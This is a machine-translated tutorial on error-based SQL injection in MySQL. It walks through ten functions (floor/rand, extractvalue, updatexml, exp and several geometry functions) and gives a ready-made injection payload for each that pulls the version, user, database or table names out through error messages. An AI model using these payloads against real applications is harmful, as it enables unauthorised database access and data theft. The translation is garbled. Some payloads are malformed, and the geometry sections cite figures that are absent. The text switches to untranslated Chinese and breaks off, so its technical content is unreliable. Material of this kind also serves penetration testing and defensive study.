Ten MySQL error function

1.Floor()

round () rounding to follow the original value into the specified number of decimal places, such as: round (1.45,0) =. 1; round (1.55,0) = 2
Floor () rounded down to the specified number of decimal places as: floor ( 1.45,0) =. 1; Floor (1.55,0). 1 =
ceiling () is rounded up to the specified number of decimal places as: ceiling (1.45,0) = 2; ceiling (1.55,0) = 2

floor (x), returns the largest integer less than or equal to x.

x represents concat (database (), rand (0) * 2), rand (0) 0 random seed to generate a random number between 0 and 1, * 2 generates a random number between 0-2.

Given reasons: duplicate primary keys necessary: ​​count (), rand (), group by

payload:

id=1 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2.ExtractValue()

ExtractValue(xml_frag, xpath_expr)ExtractValue()It accepts two string arguments, a fragment of XML tags xml_frag and an XPath expression xpath_expr (also called a locator); it returns the CDATAtext of a text node (), which is a child element node matches the element XPath expression .

The first parameter can be passed target xml file, the second parameter is represented by the search path Xpath path method

For example: SELECT ExtractValue('<a><b><b/></a>', '/a/b');it is to find the b-node under the preceding paragraph xml document content of a node, where if Xpath syntax format clerical error, it will error. Here is the use of this feature to get what we want to know.

payload:

id=1 and extractvalue(1, concat(0x7e, (select table_name from information_schema.tables limit 1)));

3.UpdateXml()

UPDATEXML (XML_document, XPath_string, new_value);

The first argument: XML_document is String format, the name of the XML document object, the text for the Doc

The second argument: XPath_string (Xpath string format), if not understand Xpath syntax, you can find tutorials online.

The third argument: new_value, String format, replacing the data to find qualified

And our injection statement is:

id=1 and 1=(updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1))

Wherein the concat () function which is connected into a string, it will not conform XPATH_string format, so there is malformed burst

ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

4.Exp()

exp is the exponential function with base e,

mysql> select exp(1);
+-------------------+
| exp(1)            |
+-------------------+
| 2.718281828459045 |
+-------------------+
1 row in set (0.00 sec)

However, the figures are much will overflow. This function will overflow when the parameter is greater than 709, an error.

mysql> select exp(709);
+-----------------------+
| exp(709)              |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)

mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

The 0 Bitwise will return "18446744073709551615" and return the sake of 0 Coupled with the successful execution of the function, the function will be inverted to get the maximum value of an unsigned BIGINT we will successfully executed.

mysql> select ~0;
+----------------------+
| ~0                   |
+----------------------+
| 18446744073709551615 |
+----------------------+
1 row in set (0.00 sec) 


mysql> select ~(select version());
+----------------------+
| ~(select version())  |
+----------------------+
| 18446744073709551610 |
+----------------------+
1 row in set, 1 warning (0.00 sec)

We subqueries bit negated, resulting in a DOUBLE overflow error, and by thus pouring out data.

mysql> select exp(~(select * from(select database())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select `x`.`database()` from (select database() AS `database()`) `x`)))'

In the scripting language, it will be wrong some of the expressions into the corresponding string, like this:

DOUBLE value is out of range in 'exp(~((select 'error_based_hpf' from dual)))'

Thus realizing the error injection.

payload：

id=1 and exp(~(select * from(select user())a));

5.GeometryCollection()

GeometryCollection understanding of: storing in a point manner, if a single point directly using the coordinates (x, y) represents, if a plurality of word lines using the points LINESTRING () to save the point on this line.

payload：

id=1 and GeometryCollection(()select *from(select user())a)b);

6.Polygon()

Polygon polygon vertices in two or more of the phase function to draw a straight line from the smell, with the current draw stroke polygonal profile, with the current brush and polygon fill mode filled polygons.

As shown in FIG:

1. FIG 1 is a ring defined by the outer boundary Polygon instance.
2. FIG 2 is a loop defined by the outer boundary of the inner ring and two Polygon instances. Area in the inner ring is Polygon part of an example of the outer ring.
3. FIG 3 is a valid Polygon instance, because of its inner ring intersect at a single tangent point.

payload：

id =1 and polygon((select * from(select * from(select user())a)b));

This point can be appreciated that the injection point after injection to limit

7.MultiPoint

MultiPoint is a collection of zero points or more points. MultiPoint border instance is empty.

payload：

id = 1 and multipoint((select * from(select * from(select user())a)b));

8.MultiLineString()

MultiLineString zero or more geometry or geographyLineString set of instances.

As shown in FIG:

• Figure 1 shows a simple MultiLineString example, which is the boundary of two LineString four endpoints element.
• Figure 2 shows a simple MultiLineString example, because only LineString end elements intersect. Boundaries are not overlapped two endpoints.
• Figure 3 shows a simple to MultiLineString example, as one of its LineString inner element intersects appeared. This MultiLineString border instance is the four endpoints.
• FIG 4 shows a simple, non-closed MultiLineString instance.
• FIG. 5 shows a simple, non-closed a MultiLineString . It is not closed because its LineStrings element is not closed. While the simple reason that it is any LineStrings internal instances do not appear intersect.
• FIG. 6 is shown a simple, closed MultiLineString instance. It is closed because all of its elements are closed. While the simple reason that all of its elements are not found inside the intersection phenomenon.

payload：

id = 1 and multilinestring((select * from(select * from(select user())a)b));

9.LineString

LineString is a one-dimensional object that represents a series of points and the segment connecting these points.

As shown in FIG:

• FIG 1 shows a simple, non-closed LineString instance.
• Figure 2 shows a simple, non-closed LineString instance.
• FIG 3 is shown in a closed, simple LineString example, is thus a ring.
• Figure 4 shows a closure, not simple LineString instance, and therefore is not a ring.

payload：

id = 1 and LINESTRING((select * from(select * from(select user())a)b));

10.MultiPolygon()

MultiPolygon Examples of zero or more Polygon set of instances.

As shown in FIG:

• 图 1 是一个包含两个 Polygon 元素的 MultiPolygon 实例。 边界由两个外环和三个内环界定。
• 图 2 是一个包含两个 MultiPolygon 元素的 Polygon 实例。 边界由两个外环和三个内环界定。 这两个 Polygon 元素在切点处相交。